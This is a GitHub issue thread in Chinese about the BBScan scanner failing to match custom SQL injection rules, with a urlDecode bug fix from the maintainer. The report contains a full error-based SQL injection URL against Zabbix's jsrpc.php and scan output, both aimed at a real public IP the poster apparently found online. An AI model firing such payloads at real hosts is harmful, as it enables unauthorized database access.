### ISSUE TITLE
添加的SQL注射规则无效

### ISSUE THREAD

**Issue by forlin** [lijiejie/BBScan#9]
今天尝试自己添加一些GET型的SQL注射规则，测试的时候发现添加的规则 并且匹配内容都是正确的 但是扫出来的结果却是
No vulnerabilities found on sites in hosts.

于是又测试了一下作者自带的zabbix的sql注入规则，网上找了台靶机

http://46.226.128.195//jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&stamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1

结果是没问题的

但是用bbscan扫了下 结果是

No vulnerabilities found on sites in hosts.

E:\BBScan-master>python BBScan.py --host 46.226.128.195 --full-scan
[14:40:00] Batch web scan start.
[14:40:00] Report thread created, prepare target Queue...
[14:40:00] 1 targets entered Queue.
[14:40:00] Create 10 sub Processes...
[14:40:00] 10 sub process successfully created.
[14:40:01] Scan 46.226.128.195
[14:40:28] No vulnerabilities found on sites in hosts.

很奇怪的问题  只要是SQL注射出来的 用{tag}标签就匹配不上 如果是页面自带的比如{tag="script"}这样肯定没问题的

请教下作者 这个怎么样解决？

**Comment by lijiejie** [comment]
感谢，已经在处理了，是因为urlDecode引起的问题，在某一次提交的时候引入的bug

**Comment by lijiejie** [comment]
试试git pull获取新的代码，可以工作吗？

**Comment by forlin** [comment]
感谢作者更新 It works!
